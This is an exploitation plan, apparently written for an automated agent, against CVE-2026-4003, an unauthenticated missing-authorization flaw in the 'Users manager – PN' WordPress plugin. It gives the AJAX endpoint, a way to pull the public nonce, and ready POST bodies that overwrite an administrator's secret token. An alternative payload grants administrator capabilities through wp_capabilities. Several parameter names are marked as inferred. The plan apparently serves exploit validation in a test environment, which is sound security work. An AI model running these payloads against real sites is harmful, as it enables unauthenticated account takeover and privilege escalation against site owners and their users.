Exploitation Research Plan: CVE-2026-4003 - Users Manager PN Privilege Escalation

1. Vulnerability Summary

The Users manager – PN plugin (<= 1.1.15) contains a critical missing authorization vulnerability in its AJAX handling logic. Specifically, the function userspn_ajax_nopriv_server() (handling unauthenticated requests) contains a case for userspn_form_save that fails to properly validate the identity or permissions of the requester when a user_id is provided. While the code attempts to block unauthenticated users if the user_id is missing, providing a valid user_id bypasses the check, allowing an unauthenticated attacker to call update_user_meta() on any user account.

The primary impact is Account Takeover by updating the userspn_secret_token meta key, which the plugin likely uses for password-less authentication or recovery.

2. Attack Vector Analysis

• Endpoint: /wp-admin/admin-ajax.php
• Action: userspn_form_save (Registered via wp_ajax_nopriv_userspn_form_save)
• HTTP Method: POST
• Authentication: None (Unauthenticated)
• Vulnerable Parameters:
  • user_id: The ID of the target user (e.g., 1 for the primary admin).
  • meta_key (inferred): The name of the meta field to update.
  • meta_value (inferred): The new value for the meta field.
  • Note: The plugin likely accepts these as POST parameters or as part of a data array.
• Nonce: userspn-nonce (Required but publicly exposed).

3. Code Flow

1. Entry Point: An unauthenticated user sends a POST request to admin-ajax.php with action=userspn_form_save.
2. Hook Trigger: WordPress executes the hook wp_ajax_nopriv_userspn_form_save, which points to userspn_ajax_nopriv_server().
3. Vulnerable Dispatcher: Inside userspn_ajax_nopriv_server(), a switch or if statement handles the userspn_form_save case.
4. Flawed Logic:

   // Logic (Simplified based on description)
   if ( empty( $_POST['user_id'] ) ) {
       // Return error or exit if user_id is missing
   } else {
       // BYPASS: If user_id IS provided, the code proceeds
       $user_id = intval( $_POST['user_id'] );
       $meta_key = $_POST['meta_key']; // or specific field like userspn_secret_token
       $value = $_POST['value'];
       update_user_meta( $user_id, $meta_key, $value );
   }
   

5. Sink: The update_user_meta() function is called with attacker-controlled parameters without checking if the current requester has the edit_user capability for that $user_id.

4. Nonce Acquisition Strategy

The vulnerability description confirms the nonce userspn-nonce is exposed via wp_localize_script on the public wp_enqueue_scripts hook.

1. Identify Target Page: The plugin's scripts are likely loaded on any page containing a login or profile form.
2. Creation of Trigger Page: If the nonce isn't on the homepage, create a page with the plugin's shortcode.
   • Search for shortcode: grep -r "add_shortcode" wp-content/plugins/userspn/
   • Likely shortcode: [userspn_form] (inferred).
3. Extraction:
   • Navigate to the page using browser_navigate.
   • Use browser_eval to extract the nonce from the global JavaScript object.
   • JS Variable Name: Based on the plugin slug, the object is likely userspn_ajax or userspn_params.
   • Key: userspn_nonce or nonce.
   • Command: browser_eval("window.userspn_params?.nonce") (Verify variable name in source first).

5. Exploitation Strategy

The goal is to update the userspn_secret_token for the admin user to a known value, which facilitates account takeover.

Step 1: Discover Admin ID

Usually ID 1. Can be confirmed via wp user list --role=administrator.

Step 2: Extract Nonce

Use the browser_eval method described above.

Step 3: Perform Meta Update

Send a crafted AJAX request.

• URL: http://<target>/wp-admin/admin-ajax.php
• Headers: Content-Type: application/x-www-form-urlencoded
• Body:

  action=userspn_form_save&user_id=1&userspn_secret_token=pwned_token_123&security=[EXTRACTED_NONCE]
  

  (Note: The parameter names userspn_secret_token and security are inferred from common plugin patterns and the "PN" branding; the agent should check the userspn_form_save case in the source for the exact keys).

Step 4: Access Account

Once the token is set, the attacker likely accesses a URL like:
http://<target>/?userspn_token=pwned_token_123&user_id=1 (inferred).

6. Test Data Setup

1. Environment: WordPress instance with userspn v1.1.15 installed.
2. Target User: Ensure an administrator exists with ID 1.
3. Public Page: Create a page to ensure the nonce is rendered.

   wp post create --post_type=page --post_status=publish --post_title="Login" --post_content="[userspn_form]"
   

7. Expected Results

• The AJAX request should return a successful JSON response (e.g., {"success": true}).
• The database should reflect the updated meta value for the admin user.

8. Verification Steps

After sending the HTTP request, verify the success via WP-CLI:

# Check if the secret token was successfully injected
wp user meta get 1 userspn_secret_token

If the output is pwned_token_123, the privilege escalation/account takeover preparation is successful.

9. Alternative Approaches

If userspn_form_save does not accept arbitrary keys, check if it accepts an array of data:

• Alternative Payload: action=userspn_form_save&user_id=1&data[userspn_secret_token]=pwned_token_123&security=[NONCE]

If the goal is immediate Escalation rather than Token injection:

• Role Update: Try updating wp_capabilities to a:1:{s:13:"administrator";b:1;} for a subscriber account controlled by the attacker.
  • action=userspn_form_save&user_id=[ATTACKER_ID]&meta_key=wp_capabilities&meta_value=a:1:{s:13:"administrator";b:1;}